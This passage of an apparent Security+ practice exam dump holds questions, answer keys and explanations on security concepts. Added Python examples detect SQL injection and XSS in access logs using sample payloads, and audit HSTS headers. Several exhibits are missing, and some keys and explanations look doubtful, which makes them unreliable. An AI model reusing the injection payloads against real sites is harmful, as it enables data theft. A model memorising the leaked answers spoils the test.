D. Install a SIEM with community-driven threat intelligence
Answer: C
Explanation:
SOAR (Security Orchestration, Automation, and Response) platforms execute playbooks or
runbooks automatically: they collect threat-related data from a range of sources and carry out the
repetitive response steps (enrichment, ticketing, blocking an indicator) for low-level alerts without
an analyst. That removes the manual work that is consuming the analysts' time; a NIDS, an OSINT
catalog, or a SIEM would add detection data but would not automate the response.
QUESTION 662
A security analyst is investigating suspicious traffic on the web server located at IP address
10.10.1.1. A search of the WAF logs reveals the following output:
Which of the following is MOST likely occurring?
A. XSS attack
B. SQLi attack
C. Replay attack
D. XSRF attack
Answer: B
Explanation:
SQL injection (SQLi) is a common attack in which malicious SQL is supplied through application
input so that the backend database executes it, exposing or modifying data the application never
meant to return. The giveaway in the log is the 1=1 in the query: a condition that is always true,
appended so that a WHERE clause matches every row.
XSS (cross-site scripting): an injection attack in which malicious scripts are injected into an
otherwise benign and trusted website and run in other users' browsers.
Replay attack: an attacker captures legitimate messages on a channel and resends them later so
they are accepted as authentic.
CSRF/XSRF (cross-site request forgery): tricks a logged-in victim's browser into sending a
state-changing request to the server, such as changing the victim's email address or password,
or making a purchase.
QUESTION 663
Which of the following is an example of transference of risk?
A. Purchasing insurance
B. Patching vulnerable servers
C. Retiring outdated applications
D. Application owner risk sign-off
Answer: A
Explanation:
Cyber insurance covers a business's liability for a data breach involving sensitive customer
information such as health records, credit card numbers, and account numbers. Policies generally
cover legal fees, customer notification, and repair of damaged systems.
Risk transference is about assigning risk to a third-party. The risk here being the financial loss
that can be incurred after a data breach from legal fees, repairing system etc. The organization is
assigning this risk to an insurance company.
QUESTION 664
A security engineer was assigned to implement a solution to prevent attackers from gaining
access by pretending to be authorized users. Which of the following technologies meets the
requirement?
A. SSO
B. IDS
C. MFA
D. TPM
Answer: C
Explanation:
MFA requires a second factor beyond the password, so an attacker who has obtained or guessed a
user's credentials still cannot authenticate as that user. SSO, an IDS, and a TPM do not stop an
impersonation carried out with valid credentials.
QUESTION 665
A tax organization is working on a solution to validate the online submission of documents. The
solution should be carried on a portable USB device that should be inserted on any computer that
is transmitting a transaction securely.
Which of the following is the BEST certificate for these requirements?
A. User certificate
B. Self-signed certificate
C. Computer certificate
D. Root certificate
Answer: A
Explanation:
A user certificate identifies an individual rather than a machine, so it can be issued on a portable
USB token (a smart card or PKI token) and used to sign or authenticate a submission from
whatever computer the taxpayer, or the representative holding power of attorney, happens to be
using. A computer certificate is bound to one machine, a root certificate belongs to the CA, and a
self-signed certificate is trusted by no one but its creator.
QUESTION 666
During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which
of the following BEST explains this reasoning?
A. The forensic investigator forgot to run a checksum on the disk image after creation.
B. The chain of custody form did not note time zone offsets between transportation regions.
C. The computer was turned off, and a RAM image could not be taken at the same time.
D. The hard drive was not properly kept in an antistatic bag when it was moved.
Answer: B
Explanation:
Chain of custody documents who collected, handled, transported, and stored the evidence, and
exactly when, so that the court can be satisfied it was never altered. Timestamps must be
unambiguous. Here the drive was carried through several regions, and a custody form that records
local times without time-zone offsets leaves apparent gaps and overlaps in the record, so an
unbroken chain cannot be shown and the evidence is excluded. A missing RAM image, a skipped
antistatic bag, or a forgotten checksum weaken the investigation but do not by themselves break
the custody record.
QUESTION 667
A security analyst needs to be able to search and correlate logs from multiple sources in a single
tool. Which of the following would BEST allow a security analyst to have this ability?
A. SOAR
B. SIEM
C. Log collectors
D. Network-attached storage
Answer: B
Explanation:
SIEM event correlation is an essential part of any SIEM solution. It aggregates and analyzes log
data from across your network applications, systems, and devices, making it possible to discover
security threats and malicious patterns of behaviors that otherwise go unnoticed and can lead to
compromise or data loss.
QUESTION 668
The chief information security officer (CISO) has requested that a third-party vendor provide
supporting documents that show proper controls are in place to protect customer data which of
the following would be BEST for the third-party vendor to provide the CISO?
A. GDPR compliance attestation
B. Cloud Security Alliance materials
C. SOC 2 Type 2 report
D. NIST RMF workbooks
Answer: C
Explanation:
A SOC 2 report is an independent auditor's report on a service provider's controls relevant to
security, availability, processing integrity, confidentiality, and privacy. A Type 2 report covers the
operating effectiveness of those controls over a period (typically six to twelve months), not just
their design at a point in time, which is exactly the supporting documentation a CISO needs from a
vendor that holds customer data. A GDPR attestation applies only to EU personal data, Cloud
Security Alliance materials are general guidance rather than evidence about this vendor, and RMF
workbooks are an internal risk-management artifact.
QUESTION 669
An enterprise has hired an outside security firm to conduct penetration testing on its network and
applications. The firm has not received information about the internal architecture. Which of the
following best represents the type of testing that will occur?
A. Bug bounty
B. Black-box
C. Gray-box
D. White-box
Answer: B
Explanation:
In white-box testing the internal structure (code, architecture) is fully known to the tester.
In black-box testing the internal structure is unknown.
In gray-box testing the internal structure is partially known.
QUESTION 670
A security analyst is reviewing application logs to determine the source of a breach and locates
the following log:
Which Of the following has been observed?
A. DLL injection
B. API attack
C. SQLi
D. XSS
Answer: C
Explanation:
The giveaway is again 1=1, a condition that is always true.
SQL injection (SQLi) is an injection attack that makes it possible to execute attacker-supplied SQL
statements against the database behind a web application. Attackers use it to bypass
authentication and other application security measures and to read or modify data.
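Detection logic for the pattern behind both of the log questions above (662 and 670), as an added example that is not part of the original questions: it parses access-log lines, URL-decodes each query parameter, and matches the decoded values against a few SQL injection and cross-site scripting signatures, so the 1=1 tautology is caught whether or not it arrived percent-encoded. The log lines are constructed samples in Combined Log Format, not a real capture.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed web-server/WAF access log lines (Combined Log Format); not a real capture.
SAMPLE_LOG = """203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /login?user=admin&pass=x HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /login?user=admin%27%20OR%201%3D1--&pass=x HTTP/1.1" 200 4096
203.0.113.7 - - [10/Oct/2023:13:55:45 +0000] "GET /products?id=3%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 500 0
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
198.51.100.9 - - [10/Oct/2023:13:56:30 +0000] "POST /api/orders HTTP/1.1" 201 88
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures run against each URL-decoded parameter value, so encoding does not hide them.
SIGNATURES = {
    "SQLi": [
        re.compile(r"'\s*(or|and)\s+[\w']+\s*=\s*[\w']+", re.I),  # ' OR 1=1  /  ' OR 'a'='a
        re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I),    # UNION SELECT ...
        re.compile(r";\s*(drop|delete|insert|update|exec)\b", re.I),
        re.compile(r"--\s*$"),                                   # trailing comment discards the rest of the query
    ],
    "XSS": [
        re.compile(r"<\s*script\b", re.I),
        re.compile(r"javascript:", re.I),
    ],
}


def classify(value):
    """Return the first attack class whose signatures match the decoded value, else None."""
    for kind, patterns in SIGNATURES.items():
        if any(p.search(value) for p in patterns):
            return kind
    return None


def detect(log_text):
    """One finding per suspicious parameter: (line number, source IP, attack class, parameter, decoded value)."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl percent-decodes
            kind = classify(value)
            if kind:
                findings.append((lineno, ip, kind, name, value))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Signature matching of this kind is a triage aid, not a WAF: it has false positives (a legitimate search for "union select"), misses obfuscated payloads and anything in a POST body that the access log does not record, and the response size jump on the second line (512 to 4096 bytes) is often the better indicator that the injection actually returned extra rows.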
QUESTION 671
A security analyst is receiving numerous alerts reporting that the response time of an
internet-facing application has been degraded. However, the internal network performance has
not been degraded.
Which of the following MOST likely explains this behavior?
A. DNS poisoning
B. MAC flooding
C. DDoS attack
D. ARP poisoning
Answer: C
Explanation:
Most denial-of-service attacks against websites and gateways are distributed (DDoS), launched
from many hosts at once. Typically a threat actor compromises machines to act as handlers in a
command-and-control network, and the handlers in turn control hundreds, thousands, or millions of
bot hosts forming a botnet.
The pattern here, where only the internet-facing application is slow while the internal network is
unaffected, fits traffic flooding in from outside. MAC flooding or ARP poisoning would degrade the
LAN itself, and DNS poisoning would misdirect clients rather than slow the application.
QUESTION 672
Which of the following explains why RTO is included in a BIA?
A. It identifies the amount of allowable downtime for an application or system.
B. It prioritizes risks so the organization can allocate resources appropriately.
C. It monetizes the loss of an asset and determines a break-even point for risk mitigation.
D. It informs the backup approach so that the organization can recover data to a known time.
Answer: A
Explanation:
RTO = Recovery time objective. "The maximum tolerable length of time that a computer, system,
network or application can be down after a failure or disaster occurs."
QUESTION 673
A company recently moved into a new annex of the building. Following the move, the help desk
received reports of weak Wi-Fi signals from users in that part of the building. Which of the
following is the MOST likely cause of this issue?
A. WAP placement
B. Channel overlap
C. Captive portals
D. AP security
Answer: A
QUESTION 674
Which of the following is a benefit of including a risk management framework into an
organizations security approach?
A. It defines expected service levels from participating supply chain partners to ensure system
outages are remediated in a timely manner.
B. It defines specific vendor products that have been tested and approved for use in a secure
environment.
C. It provides legal assurances and remedies in the event a data breach occurs.
D. It incorporates control development, policy, and management activities into IT operations.
Answer: D
Explanation:
An effective risk management framework will prioritize understanding the risks that your business
faces to take the necessary steps to protect your assets and your business.
QUESTION 675
A security analyst is evaluating solutions to deploy an additional layer of protection for a web
application. The goal is to allow only encrypted communications without relying on devices.
Which of the following can be implemented?
A. HTTP security header
B. DNSSEC implementation
C. SRTP
D. S/MIME
Answer: A
Explanation:
HTTP Strict Transport Security (HSTS), sent as the Strict-Transport-Security response header,
tells browsers that have seen it to reach the site only over HTTPS for the stated max-age,
rewriting plain http:// links and refusing to click through certificate errors. It is set by the
application or web server, so it needs no network device. Two caveats: the header is honored only
when received over HTTPS, and it takes effect only after a browser's first secure visit (or once the
domain is on the browser preload list), so the server must still redirect HTTP to HTTPS for that
first contact.
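A check for the header's actual value, as an added example that is not part of the original question: it parses a Strict-Transport-Security value per the RFC 6797 directive grammar and reports the weaknesses a practitioner would look for (missing header, no or short max-age, max-age=0, no includeSubDomains). The header dictionaries in the test are constructed samples; the one-year minimum is the value the browser preload list requires.

```python
MIN_MAX_AGE = 31536000  # one year in seconds, the minimum the browser preload list accepts

MESSAGES = {
    "hsts-missing": "no Strict-Transport-Security header: browsers will still follow http:// links",
    "hsts-malformed": "Strict-Transport-Security could not be parsed; browsers ignore a malformed header",
    "hsts-no-max-age": "max-age directive absent; the header has no effect",
    "hsts-disabled": "max-age=0 tells browsers to forget the policy",
    "hsts-short-max-age": "max-age below one year; the policy expires before users return",
    "hsts-no-subdomains": "includeSubDomains not set; subdomains can still be reached over plain HTTP",
}


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age or None, includeSubDomains, preload)."""
    max_age, include_sub, preload = None, False, False
    for directive in value.split(";"):
        directive = directive.strip()
        if not directive:
            continue
        name, _, arg = directive.partition("=")
        name, arg = name.strip().lower(), arg.strip().strip('"')
        if name == "max-age":
            if not arg.isdigit():
                raise ValueError(f"bad max-age: {arg!r}")
            max_age = int(arg)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
        # unknown directives are ignored, as the RFC 6797 grammar requires
    return max_age, include_sub, preload


def assess(headers):
    """Return a list of finding codes for a dict of response headers (names matched case-insensitively)."""
    lower = {k.lower(): v for k, v in headers.items()}
    value = lower.get("strict-transport-security")
    if value is None:
        return ["hsts-missing"]
    try:
        max_age, include_sub, _preload = parse_hsts(value)
    except ValueError:
        return ["hsts-malformed"]
    findings = []
    if max_age is None:
        findings.append("hsts-no-max-age")
    elif max_age == 0:
        findings.append("hsts-disabled")
    elif max_age < MIN_MAX_AGE:
        findings.append("hsts-short-max-age")
    if not include_sub:
        findings.append("hsts-no-subdomains")
    return findings


if __name__ == "__main__":
    weak = {"Strict-Transport-Security": "max-age=300"}  # constructed sample response
    for code in assess(weak):
        print(f"{code}: {MESSAGES[code]}")
```

In a real review the headers come from an HTTPS response to the site (for example via requests or curl -I), and a separate request over plain HTTP should be checked for a 301/302 redirect to HTTPS, since that redirect is what delivers the header on first contact.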
QUESTION 676
An IT security manager requests a report on company information that is publicly available. The
manager's concern is that malicious actors will be able to gather the data without any active
reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?
A. Provide a domain parameter to the theHarvester tool
B. Check public DNS entries using dnsenum
C. Perform a Nessus vulnerability scan targeting the company's public IP
D. Execute nmap using the options: scan all ports and sneaky mode
Answer: A
Explanation:
theHarvester gathers subdomain names, e-mail addresses, virtual hosts, open ports/banners, and
employee names from public sources (search engines, PGP key servers) without touching the
target, which is exactly the passive, attacker's-eye view the manager wants, and it does so for a
whole domain in one run. dnsenum is largely passive too but covers DNS only; Nessus and nmap
are active scans that touch the company's own systems and reveal nothing about what is already
public.
QUESTION 677
Which of the following documents provides expectations at a technical level for quality,
availability, and responsibilities?
A. EOL
B. SLA
C. MOU
D. EOSL
Answer: B
QUESTION 678
A security policy states that common words should not be used as passwords. A security auditor
was able to perform a dictionary attack against corporate credentials. Which of the following
controls was being violated?
A.
B.
C.
D.
password complexity
password history
password reuse
password length
Answer: A
Explanation:
Password complexity is a measure of how difficult a password is to guess against any number of
guessing or cracking methods. A dictionary attack tries words from a wordlist (plus common
variations) against each account; for the auditor to succeed, the credentials must have been
common words, which is precisely what the complexity rule in the policy forbids. History and reuse
rules govern changing passwords over time, and length alone does not stop a long dictionary word.
QUESTION 679
A technician enables full disk encryption on a laptop that will be taken on a business trip. Which
of the following does this process BEST protect?
A. Data in transit
B. Data in processing
C. Data at rest
D. Data tokenization
Answer: C
Explanation:
Data at rest: Data at rest is data in its stored or resting state, which is typically on some type of
persistent storage such as a hard drive or tape. Symmetric encryption is used in this case.
QUESTION 680
In a phishing attack, the perpetrator is pretending to be someone in a position of power in an
effort to influence the target to click or follow the desired response. Which of the following
principles is being used?
A. Authority
B. Intimidation
C. Consensus
D. Scarcity
Answer: A
Explanation:
Pretending to be someone in a position of power (an executive, an auditor, law enforcement) so
that the target complies is the authority principle. Intimidation would involve explicit threats of
consequences, consensus appeals to what everyone else is doing, and scarcity creates pressure
through limited availability or time.
QUESTION 681
A company is working on mobile device security after a report revealed that users granted
non-verified software access to corporate data. Which of the following is the MOST effective
security control to mitigate this risk?
A. Block access to application stores
B. Implement OTA updates
C. Update the BYOD policy
D. Deploy a uniform firmware
Answer: A
Explanation:
Blocking access to the public application stores (through the MDM) is the most effective way to
stop standard users from installing unverified software on corporate-owned phones; applications
are then delivered only through the enterprise app catalog. OTA updates, a policy document, and
uniform firmware do not stop a user from installing an unvetted app.
QUESTION 682
A company labeled some documents with the public sensitivity classification. This means the
documents can be accessed by?
A. Employees of other companies and the press
B. All members of the department that created the documents
C. Only the company's employees and those listed in the document
D. Only the individuals listed in the documents
Answer: A
Explanation:
Public (unclassified) - there are no restrictions on viewing the data. Public information presents no
risk to an organization if it is disclosed but does present a risk if it is modified or not available.
QUESTION 683
A security engineer is building a file transfer solution to send files to a business partner. The
users would like to drop off the files in a specific directory and have the server send them to the
business partner. The connection to the business partner is over the internet and needs to be
secure. Which of the following can be used?
A. S/MIME
B. LDAPS
C. SSH
D. SRTP
Answer: C
Explanation:
SSH (Secure Shell) - A protocol that enables two computers to communicate securely
by encrypting the connection. Since the question requires transferring files over the internet into a
specific directory, a file transfer protocol can handle the transfer itself; running that file transfer
over SSH (as SFTP does) gives secure (SSH) file transfer over the internet.
S/MIME (Secure/Multipurpose Internet Mail Extensions) - Digitally signs and encrypts the
contents of email messages.
LDAPS (Lightweight Directory Access Protocol over SSL/TLS) - Provides authentication and encryption for directory-based
traffic.
SRTP (Secure Real-time Transport Protocol) - Provides authentication/encryption for transmitted
audio and video traffic.
QUESTION 684
A security incident has been resolved. Which of the following BEST describes the importance of
the final phase of the incident response plan?
A. it examines and documents how well the team responded, discovers what caused the incident,
and determines how the incident can be avoided in the future
B. it returns the affected systems back into production once systems have been fully patched, data
restored, and vulnerabilities addressed
C. it identifies the incident and the scope of the breach, how it affects the production environment,
and the ingress point
D. it contains the affected systems and disconnects them from the network, preventing further
spread of the attack or breach.
Answer: A
Explanation:
The final phase of the incident response is also called the lessons learned or remediation step.
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response and identifying where improvements can be made for
future incidents.
QUESTION 685
A business operations manager is concerned that a PC that is critical to business operations will
have a costly hardware failure soon. The manager is looking for options to continue business
operations without incurring large costs. Which of the following would mitigate the manager's
concerns?
A. Implement a full system upgrade
B. Perform a physical-to-virtual migration
C. Install uninterruptible power supplies
D. Purchase cybersecurity insurance
Answer: B
Explanation:
A physical-to-virtual (P2V) migration is the migration of a physical machine to a virtual machine.
Converting the PC to a VM will allow it to continue its operations on a
different host. The other options would require the PC to be turned off, so the organization would lose
access to its function.
QUESTION 686
An engineer recently deployed a group of 100 web servers in a cloud environment.
Per the security policy, all web-server ports except 443 should be disabled.
Which of the following can be used to accomplish this task?
A. Application allow list
B. SWG
C. Host-based firewall
D. VPN
Answer: C
Explanation:
Host-based firewall - A firewall on a host where you can configure rules for the
ports/connections allowed on that specific host.
As the question specifically asks for web-server ports to be blocked, it makes the most
sense to configure rules to block the ports on each web server.
Application allow list - A list of applications and application components that are permitted to
reside or perform actions on a device.
SWG (Secure Web Gateway) - A security product that operates between employees and the
internet by filtering unsafe content from web traffic to stop cyber threats and data breaches. SWGs
also block risky or unauthorized user behavior and usually analyze the content of traffic.
VPN (Virtual Private Network) - A service that establishes a secure, encrypted connection
between networks over the internet. Hosts connected over the VPN behave logically as if
they're on the same network even if they are physically not.
QUESTION 687
A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services.
Which of the following would BEST allow the company to meet this requirement?
A. IaaS
B. PaaS
C. MaaS
D. SaaS
Answer: D
Explanation:
Phones don't need access to server and network hardware (IaaS), application development
platforms (PaaS), or monitoring (MaaS); the users only need the applications themselves (SaaS).
QUESTION 688
Which of the following control types would be BEST to use in an accounting department to
reduce losses from fraudulent transactions?
A. Recovery
B. Deterrent
C. Corrective
D. Detective
Answer: D
Explanation:
Detective controls - look for both fraudulent and unintentionally improper transactions after the
fact. Examples of detective controls include reconciliations, variance analyses, physical
inventories, audits, and continuous monitoring through data analytics.
QUESTION 689
The database administration team is requesting guidance for a secure solution that will ensure
confidentiality of cardholder data at rest only in certain fields in the database schema.
The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered
useless if a data breach occurs.
Which of the following is the BEST solution to meet the requirement?
A. Tokenization
B. Masking
C. Full disk encryption
D. Mirroring
Answer: A
Explanation:
Tokenization is mainly used to protect data at rest whereas masking is used to protect data in
use.
QUESTION 690
A SOC operator is analyzing a log file that contains the following entries:
A. SQL injection and improper input-handling attempts
B. Cross-site scripting and resource exhaustion attempts
C. Command injection and directory traversal attempts
D. Error handling and privilege escalation attempts
Answer: C
Explanation:
Directory traversal is when an attacker uses the software on a web server to access data in a
directory other than the server's root directory. If the attempt is successful, the threat actor can
view restricted files or execute commands on the server.
Command injection is an attack that involves executing commands on a host. Typically, the threat
actor injects the commands by exploiting an application vulnerability, such as insufficient input
validation.
In the log entries, the attacker is attempting to traverse the directories of the host and execute the cat command,
which could be used to print the contents of a file.
QUESTION 691
Which of the following actions would be recommended to improve an incident response process?
A. Train the team to identify the difference between events and incidents
B. Modify access so the IT team has full access to the compromised assets
C. Contact the authorities if a cybercrime is suspected
D. Restrict communication surrounding the response to the IT team
Answer: A
Explanation:
An event is defined as an attempt, successful or unsuccessful, to gain unauthorized access to,
disrupt or misuse an Information System or information stored on such Information System.
An incident is defined as a breach of a system's security policy in order to affect its integrity or
availability and/or the unauthorised access or attempted access to a system or systems.
QUESTION 692
An organization would like to give remote workers the ability to use applications hosted inside the
corporate network. Users will be allowed to use their personal computers, or they will be provided
organization assets. Either way, no data or applications will be installed locally on any user
systems. Which of the following mobile solutions would accomplish these goals?
A. VDI
B. MDM
C. COPE
D. UTM
Answer: A
Explanation:
MDM would require something to be installed on the user systems. VDI (virtual desktop infrastructure) allows
employees to run apps on the company network without installing anything locally.
QUESTION 693
The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy
requiring all unsanctioned high-risk SaaS applications to be blocked from user access. Which of
the following is the BEST security solution to reduce this risk?
A. CASB
B. VPN concentrator
C. MFA
D. VPC endpoint
Answer: A
Explanation:
A cloud access security broker (CASB) is on-premises or cloud-based software that sits between
a cloud service consumer and a cloud service provider. It serves as a tool for enforcing an
organization's security policies through risk identification and regulation compliance whenever its
cloud-residing data is accessed.
QUESTION 694
Which of the following would BEST provide detective and corrective controls for thermal
regulation?
A. A smoke detector
B. A fire alarm
C. An HVAC system
D. A fire suppression system
E. Guards
Answer: C
Explanation:
An HVAC system is designed to control the environment in which it works. It achieves this by
controlling the temperature (THERMAL) of a room through heating and cooling. It also controls
the humidity level in that environment by controlling the movement and distribution of air inside
the room. So it provides detective and corrective controls for THERMAL regulation.
QUESTION 695
Which of the following statements BEST describes zero-day exploits?
A. When a zero-day exploit is discovered, the system cannot be protected by any means
B. Zero-day exploits have their own scoring category in CVSS
C. A zero-day exploit is initially undetectable and no patch for it exists
D. Discovering zero-day exploits is always performed via bug bounty programs
Answer: C
Explanation:
A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not
yet patched. An exploit that attacks a zero-day vulnerability is called a zero-day exploit. In fact, a
zero-day exploit leaves NO opportunity for detection ... at first.
QUESTION 696
An organization discovered files with proprietary financial data have been deleted. The files have
been recovered from backup, but every time the Chief Financial Officer logs in to the file server,
the same files are deleted again. No other users are experiencing this issue. Which of the
following types of malware is MOST likely causing this behavior?
A. Logic bomb
B. Crypto malware
C. Spyware
D. Remote access Trojan
Answer: A
Explanation:
Logic bomb: a set of instructions secretly incorporated into a program so that if a particular
condition is satisfied they will be carried out, usually with harmful effects.
QUESTION 697
An IT manager is estimating the mobile device budget for the upcoming year.
Over the last five years, the number of devices that were replaced due to loss, damage, or theft
steadily increased by 10%.
Which of the following would BEST describe the estimated number of devices to be replaced next
year?
A. ALE
B. ARO
C. RPO
D. SLE
Answer: B
Explanation:
ARO - The annualized rate of occurrence is a representation of the frequency of an event, measured
over a standard year. In this case it is the number of defective (lost, damaged, or stolen) devices per year.
Annualized Loss Expectancy (ALE) is the expected monetary loss for an asset due to a risk over a
one-year period (SLE x ARO). This question is asking about the number of devices lost in a year,
not about money, so ALE does not fit.
QUESTION 698
Which of the following is assured when a user signs an email using a private key?
A. Non-repudiation
B. Confidentiality
C. Availability
D. Authentication
Answer: A
Explanation:
Professor Messer notes
• Non-Repudiation
– Confirm the authenticity of data
– Digital signature provides both integrity and non-repudiation
QUESTION 699
An organization implemented a process that compares the settings currently configured on
systems against secure configuration guidelines in order to identify any gaps.
Which of the following control types has the organization implemented?
A. Compensating
B. Corrective
C. Preventive
D. Detective
Answer: C
Explanation:
Preventive: the control acts to eliminate or reduce the likelihood that an attack can succeed. A
preventive control operates before an attack can take place. Compensating means substituting
one control with another (which has not happened here), Corrective means the attack has already happened
(not mentioned), and Detective is incorrect because a detective control detects ATTACKS, not
vulnerabilities.
QUESTION 700
A company wants to improve end users' experiences when they log in to a trusted partner
website. The company does not want the users to be issued separate credentials for the partner
website. Which of the following should be implemented to allow users to authenticate using their
own credentials to log in to the trusted partner's website?
A. Directory service
B. AAA server
C. Federation
D. Multifactor authentication
Answer: C
Explanation:
Federation: A process that allows for the conveyance of identity and authentication information
across a set of networked systems.
QUESTION 701
Which of the following would be the BEST way to analyze diskless malware that has infected a
VDI?
A. Shut down the VDI and copy off the event logs.
B. Take a memory snapshot of the running system.
C. Use NetFlow to identify command-and-control IPs.
D. Run a full on-demand scan of the root volume.
Answer: B
Explanation:
Taking a memory snapshot of the running VDI captures the diskless malware while it is resident and lets us both analyze
and temporarily isolate the threat: the system can then be shut down and the snapshot analyzed further.
QUESTION 702
After a recent security incident, a security analyst discovered that unnecessary ports were open
on a firewall policy for a web server.
Which of the following firewall policies would be MOST secure for a web server?
A.
B.
C.
D.
Answer: D
QUESTION 703
A report delivered to the Chief Information Security Officer (CISO) shows that some user
credentials could be exfiltrated. The report also indicates that users tend to choose the same
credentials on different systems and applications.
Which of the following policies should the CISO use to prevent someone from using the exfiltrated
credentials?
A. MFA
B. Lockout
C. Time-based logins
D. Password history
Answer: D
Explanation:
Password history - In this scenario, the report stated that some credentials could have been
exfiltrated. This means that an unauthorized transfer of these credentials has occurred, possibly
due to a security breach.
A password history policy determines the number of unique new passwords that must be associated
with a user's account before an old password can be reused, essentially forcing users to create new
passwords on a regular basis. The report states that there are users who reuse the same
credentials, so a password history policy will be useful because users would have to create new, unique
passwords.
MFA could be a preventive measure: an attacker could have a user's credentials, but with MFA
configured they would still need access to whatever other factor(s) the user has
configured for the MFA process. However, MFA does not prevent an attacker from using the
exfiltrated credentials themselves, which is the primary concern in the scenario, so it does not directly
address the issue, whereas a password history policy prevents previous passwords from being
used after a password change.
QUESTION 704
A user is attempting to navigate to a website from inside the company network using a desktop.
When the user types in the URL https://www.site.com, the user is presented with a certificate
mismatch warning from the browser. The user does not receive a warning when visiting
http://www.anothersite.com. Which of the following describes this attack?
A. On-path
B. Domain hijacking
C. DNS poisoning
D. Evil twin
Answer: C
Explanation:
DNS poisoning - DNS poisoning occurs when attackers gain access to a DNS server (or its cache) and
redirect traffic to a different IP address by altering a DNS record.
For this question, DNS poisoning of an HTTPS site results in a certificate mismatch error, because the
server the user is redirected to cannot present a valid certificate for www.site.com, which indicates that a DNS record has been altered.
QUESTION 705
A new company wants to avoid channel interference when building a WLAN. The company needs
to know the radio frequency behavior, identify dead zones, and determine the best place for
access points. Which of the following should be done FIRST?
A. Configure heat maps.
B. Utilize captive portals.
C. Conduct a site survey.
D. Install Wi-Fi analyzers.
Answer: C
QUESTION 706
Which of the following tools is effective in preventing a user from accessing unauthorized
removable media?
A. USB data blocker
B. Faraday cage
C. Proximity reader
D. Cable lock
Answer: A
Explanation:
A USB data blocker, also known as a “USB condom” (really, no kidding!), is a device that lets
you plug into USB charging ports, including charging kiosks and USB ports on gadgets owned
by other people, while passing only power and not the data lines.
The main purpose of using one is to eliminate the risk of infecting your phone or tablet with
malware and to prevent attackers from installing or executing malicious code to access your data.
QUESTION 707
An engineer wants to inspect traffic to a cluster of web servers in a cloud environment.
Which of the following solutions should the engineer implement?
A. Proxy server
B. WAF
C. Load balancer
D. VPN
Answer: B
QUESTION 708
A user enters a username and a password at the login screen for a web portal. A few seconds
later the following message appears on the screen: Please use a combination of numbers,
special characters, and letters in the password field.
Which of the following concepts does this message describe?
A. Password complexity
B. Password reuse
C. Password history
D. Password age
Answer: A
Explanation:
Password complexity - A policy that obliges users to choose passwords with certain
characteristics (for example, more than X characters, and a mix of numbers, symbols, and letters).
QUESTION 709
An incident has occurred in the production environment.
Analyze the command outputs and identify the type of compromise. If at any time you would like
to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Logic Bomb and Backdoor
Explanation:
The first compromise relies on a cron job that executes every five minutes (the logic bomb).
The second compromise opens port 31337 (the backdoor). https://www.eicar.org/download/eicar.com.txt is the
EICAR test file for AV products: instead of real malware, which could cause real damage, this test file
allows people to test anti-virus software without having to use a real computer virus.
QUESTION 710
Data exfiltration analysis indicates that an attacker managed to download system configuration
notes from a web server. The web-server logs have been deleted, but analysts have determined
that the system configuration notes were stored in the database administrator's folder on the web
server. Which of the following attacks explains what occurred? (Choose two.)
A. Pass-the-hash
B. Directory traversal
C. SQL injection
D. Privilege escalation
E. Cross-site scripting
F. Request forgery
Answer: BD
Explanation:
The simplest example of a directory traversal attack is when an application displays or allows the
user to download a file via a URL parameter.
Directory traversal is a type of HTTP exploit in which a hacker uses the software on a web server
to access data in a directory other than the server's root directory. If the attempt is successful, the
threat actor can view restricted files or execute commands on the server.
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an
operating system or software application to gain elevated access to resources that are normally
protected from an application or user.
QUESTION 711
Which of the following is the MOST effective control against zero-day vulnerabilities?
A. Network segmentation
B. Patch management
C. Intrusion prevention system
D. Multiple vulnerability scanners
Answer: A
Explanation:
An IPS can only protect against known host- and application-based attacks and exploits. An IPS inspects
traffic against signatures and anomalies; it covers a broad spectrum of attack types, most of
them signature-based, and signatures alone cannot protect against zero-day attacks.
With network segmentation, however, you are able to isolate critical assets into different segments.
When a zero-day attack occurs, you are not at risk of losing everything and are able to confine the
attack's effect to one segment.
QUESTION 712
Which of the following organizations sets frameworks and controls for optimal security
configuration on systems?
A. ISO
B. GDPR
C. PCI DSS
D. NIST
Answer: A
Explanation:
NIST CSF - The US National Institute of Standards and Technology framework for improving
critical infrastructure cybersecurity.
CIS - The Center for Internet Security critical security controls.
ISO/IEC 27001 and 27002 - The International Organization for Standardization frameworks for best
practices around security management and controls.
QUESTION 713
Which of the following describes the exploitation of an interactive process to gain access to
restricted areas?
A. Persistence
B. Buffer overflow
C. Privilege escalation
D. Pharming
Answer: C
Explanation:
The interactive process being exploited is the command line (an interactive shell), from which exploits can be run to gain root
permissions on a system.
QUESTION 714
Which of the following is a known security risk associated with data archives that contain financial
information?
A. Data can become a liability if archived longer than required by regulatory guidance
B. Data must be archived off-site to avoid breaches and meet business requirements
C. Companies are prohibited from providing archived data to e-discovery requests
D. Unencrypted archives should be preserved as long as possible and encrypted
Answer: A
Explanation:
https://www.ontrack.com/en-gb/blog/archiving-risk-security-risks-associated-with-tape-storage
QUESTION 715
A large bank with two geographically dispersed data centers is concerned about major power
